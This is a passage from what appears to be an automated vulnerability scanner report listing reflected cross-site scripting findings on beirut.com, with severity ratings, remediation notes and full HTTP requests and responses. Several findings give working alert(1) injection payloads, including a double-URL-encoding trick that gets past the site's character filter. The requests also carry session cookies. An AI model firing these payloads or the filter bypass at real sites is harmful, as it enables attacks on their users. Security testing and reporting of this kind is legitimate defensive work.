The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1beb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45540681358 was submitted in the REST URL parameter 3. This input was echoed as 1beb1"><script>alert(1)</script>45540681358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /JustForKids/Sports/1-event1beb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45540681358 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:34:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=JustForKids&listingtype=justforkids.php&Types=1-event1beb1"><script>alert(1)</script>45540681358">
...[SNIP]...

4.559. http://www.beirut.com/Movies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b593'-alert(1)-'8865ccc3e21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies4b593'-alert(1)-'8865ccc3e21 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies4b593'-alert(1)-'8865ccc3e21';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.560. http://www.beirut.com/Movies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0d6"><a>1c13d275cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies7f0d6"><a>1c13d275cd3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies7f0d6"><a>1c13d275cd3">
...[SNIP]...

4.561. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f5f"><a>5d1b1f40a8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies56f5f"><a>5d1b1f40a8b/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:34:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies56f5f"><a>5d1b1f40a8b">
...[SNIP]...

4.562. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26b89'-alert(1)-'ed4f110a366 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies26b89'-alert(1)-'ed4f110a366/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies26b89'-alert(1)-'ed4f110a366';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.563. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2386c42c93 was submitted in the REST URL parameter 4. This input was echoed as a8d8a"><script>alert(1)</script>a2386c42c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Dunes/1083a8d8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2386c42c93 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:54:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Movies&listingtype=movies.php&Types=1083a8d8a"><script>alert(1)</script>a2386c42c93">
...[SNIP]...

4.564. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cfdf'-alert(1)-'08a5d997df8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies3cfdf'-alert(1)-'08a5d997df8/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:01:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Movies3cfdf'-alert(1)-'08a5d997df8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.565. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b1e"><a>a6bbf04bcd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Moviesb9b1e"><a>a6bbf04bcd1/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Moviesb9b1e"><a>a6bbf04bcd1">
...[SNIP]...

4.566. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa186%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3126f33e5d was submitted in the REST URL parameter 4. This input was echoed as fa186"><script>alert(1)</script>c3126f33e5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Grand-Cinemas-ABC/1087fa186%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3126f33e5d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:12:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=Movies&listingtype=movies.php&Types=1087fa186"><script>alert(1)</script>c3126f33e5d">
...[SNIP]...

4.567. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16eaf'-alert(1)-'deb97ca46cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies16eaf'-alert(1)-'deb97ca46cb/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:41:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies16eaf'-alert(1)-'deb97ca46cb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.568. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0fa"><a>c365b99de15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies5f0fa"><a>c365b99de15/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies5f0fa"><a>c365b99de15">
...[SNIP]...

4.569. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a772%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e378dee22916 was submitted in the REST URL parameter 4. This input was echoed as 8a772"><script>alert(1)</script>378dee22916 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Grand-Concorde/10868a772%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e378dee22916 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Movies&listingtype=movies.php&Types=10868a772"><script>alert(1)</script>378dee22916">
...[SNIP]...

4.570. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf69"><a>ce7e68797bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Moviesddf69"><a>ce7e68797bc/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:28:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60878

